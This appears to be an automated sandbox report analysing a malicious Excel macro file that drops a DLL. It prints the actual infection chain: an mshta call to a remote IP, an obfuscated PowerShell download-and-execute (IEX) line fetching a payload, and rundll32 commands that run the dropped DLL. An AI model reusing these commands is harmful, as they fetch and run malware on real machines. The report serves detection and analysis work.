                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038A2E810_2_0038A2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00389EEC10_2_00389EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00374EE310_2_00374EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003764E210_2_003764E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038DEDC10_2_0038DEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037B2C710_2_0037B2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003866CA10_2_003866CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037E2CC10_2_0037E2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00385CC410_2_00385CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037773510_2_00377735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038473C10_2_0038473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00390F3310_2_00390F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00378B3D10_2_00378B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00376D2410_2_00376D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038BB2310_2_0038BB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038851910_2_00388519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00380B1910_2_00380B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037971410_2_00379714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037BB7E10_2_0037BB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038176B10_2_0038176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037536110_2_00375361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037896910_2_00378969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038CB5B10_2_0038CB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037A55F10_2_0037A55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038255010_2_00382550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037CF4710_2_0037CF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037434610_2_00374346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038894B10_2_0038894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037B74D10_2_0037B74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037554810_2_00375548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003781B710_2_003781B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003909B510_2_003909B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003751BB10_2_003751BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038C3A010_2_0038C3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00387BA610_2_00387BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037E99110_2_0037E991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038E39510_2_0038E395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038D38910_2_0038D389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00379B8310_2_00379B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00384B8710_2_00384B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00386DF810_2_00386DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037DFF310_2_0037DFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038DBEA10_2_0038DBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00388BE310_2_00388BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00387DD510_2_00387DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00372BD910_2_00372BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00389BCF10_2_00389BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00379DCF10_2_00379DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037E5CF10_2_0037E5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003600711_2_10036007
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1004105011_2_10041050
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003130F11_2_1003130F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100323E211_2_100323E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003046011_2_10030460
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1004159211_2_10041592
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003E59F11_2_1003E59F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003960C11_2_1003960C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100317E211_2_100317E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10040B0E11_2_10040B0E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10031BB611_2_10031BB6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10041C5611_2_10041C56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10036CB511_2_10036CB5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1001CD1611_2_1001CD16
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10042D2111_2_10042D21
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10031FC211_2_10031FC2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027F8FD11_2_0027F8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027E99111_2_0027E991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027AB8711_2_0027AB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028000111_2_00280001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027901111_2_00279011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028907F11_2_0028907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027205111_2_00272051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0029005611_2_00290056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002820BA11_2_002820BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002770B311_2_002770B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027F09B11_2_0027F09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028411611_2_00284116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002781B711_2_002781B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002751BB11_2_002751BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027225111_2_00272251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028A2E811_2_0028A2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027B2C711_2_0027B2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027E2CC11_2_0027E2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027536111_2_00275361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027434611_2_00274346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002913AD11_2_002913AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028C3A011_2_0028C3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028D38911_2_0028D389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028E39511_2_0028E395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028F43511_2_0028F435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028044F11_2_0028044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002764E211_2_002764E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028851911_2_00288519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027554811_2_00275548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027A55F11_2_0027A55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028255011_2_00282550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002895FA11_2_002895FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027E5CF11_2_0027E5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028C63111_2_0028C631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028860611_2_00288606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028A66611_2_0028A666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002866CA11_2_002866CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027D6D811_2_0027D6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027773511_2_00277735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028473C11_2_0028473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027971411_2_00279714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028176B11_2_0028176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027B74D11_2_0027B74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027481611_2_00274816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028188911_2_00281889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027896911_2_00278969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028894B11_2_0028894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002909B511_2_002909B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002759F211_2_002759F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028AA3011_2_0028AA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00271A5611_2_00271A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027EA9911_2_0027EA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028BB2311_2_0028BB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00278B3D11_2_00278B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00280B1911_2_00280B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027BB7E11_2_0027BB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028CB5B11_2_0028CB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00287BA611_2_00287BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00279B8311_2_00279B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00284B8711_2_00284B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028DBEA11_2_0028DBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00288BE311_2_00288BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00289BCF11_2_00289BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00272BD911_2_00272BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00277C3711_2_00277C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028AC3A11_2_0028AC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00273C3C11_2_00273C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00290C1411_2_00290C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00286C4911_2_00286C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00274C5D11_2_00274C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028DCF711_2_0028DCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00285CC411_2_00285CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00276D2411_2_00276D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00286DF811_2_00286DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00279DCF11_2_00279DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00287DD511_2_00287DD5
                            Source: 32E3.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                            Source: C:\Windows\SysWOW64\rundll32.exe Process Stats: CPU usage > 98%
                            Source: 2022-28-01_1202.xls Macro extractor: Sheet name: REEEEEEEE
                            Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                            Source: Joe Sandbox View Dropped File: C:\ProgramData\JooSee.dll 21C51D21F3133DF7A51F34255F0E545390A863D5D5C48FB657EAAD3EF72BF253
                            Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018E249 DeleteService,12_2_0018E249
                            Source: 2022-28-01_1202.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                            Source: C:\Users\user\Desktop\2022-28-01_1202.xls, type: DROPPED Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                            Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Vkgzbyhfrraf\
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10032B38 appears 108 times
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100201F1 appears 34 times
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100200FD appears 72 times
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D27 appears 288 times
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 1001F9FC appears 52 times
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D5A appears 82 times
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100359C1 appears 46 times
                            Source: 2022-28-01_1202.xls OLE indicator, VBA macros: true
                            Source: 2022-28-01_1202.xls.0.dr OLE indicator, VBA macros: true
                            Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@25/9@2/48
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
                            Source: 2022-28-01_1202.xls OLE indicator, Workbook stream: true
                            Source: 2022-28-01_1202.xls.0.dr OLE indicator, Workbook stream: true
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc,9_2_100125C0
                            Source: 2022-28-01_1202.xls ReversingLabs: Detection: 11%
                            Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                            Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html
                            Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vkgzbyhfrraf\kkeql.uvv",ZIMElQfgS
                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vkgzbyhfrraf\kkeql.uvv",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ycuydicj\gmnn.kvd",zrvqzkK
                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ycuydicj\gmnn.kvd",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Glljiacvqavadds\bppnvnegw.hzh",vtyiOTNVC
                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Glljiacvqavadds\bppnvnegw.hzh",DllRegisterServer
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.htmlJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.htmlJump to behavior
                            Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD142.tmp
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 17_2_002A5988 CreateToolhelp32Snapshot, 17_2_002A5988
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                            Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                            Source: Window Recorder Window detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                            Source: Binary string: >ystem.pdbT source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
                            Source: 32E3.tmp.0.dr Initial sample: OLE indicators vbamacros = False
                            Source: C:\Windows\System32\mshta.exe Code function: 4_3_031E08CF push 8B4902A5h; iretd 4_3_031E08D4
                            Source: C:\Windows\System32\mshta.exe Code function: 4_3_031E00BB push 8B4902A5h; iretd 4_3_031E00C1
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10032B7D push ecx; ret 9_2_10032B90
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030DFF push ecx; ret 9_2_10030E12
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10032B7D push ecx; ret 11_2_10032B90
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10030DFF push ecx; ret 11_2_10030E12
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer, 9_2_1003D873
                            Source: JooSee.dll.6.dr Static PE information: real checksum: 0x8df98 should be: 0x8e522
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\JooSee.dll
                            Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Vkgzbyhfrraf\kkeql.uvv (copy)

                            Hooking and other Techniques for Hiding and Protection

                            Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Vkgzbyhfrraf\kkeql.uvv:Zone.Identifier read attributes | delete
                            Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Ycuydicj\gmnn.kvd:Zone.Identifier read attributes | delete
                            Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Glljiacvqavadds\bppnvnegw.hzh:Zone.Identifier read attributes | delete
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100134F0 IsIconic, 9_2_100134F0
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect, 9_2_10018C9A
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100134F0 IsIconic, 11_2_100134F0
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect, 11_2_10018C9A
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exe TID: 1992 Thread sleep time: -360000s >= -30000s
                            Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 3.2 %
                            Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node graph_9-32094
                            Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node graph_11-32094
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                            Source: rundll32.exe, 0000000A.00000002.529168355.000000000045A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
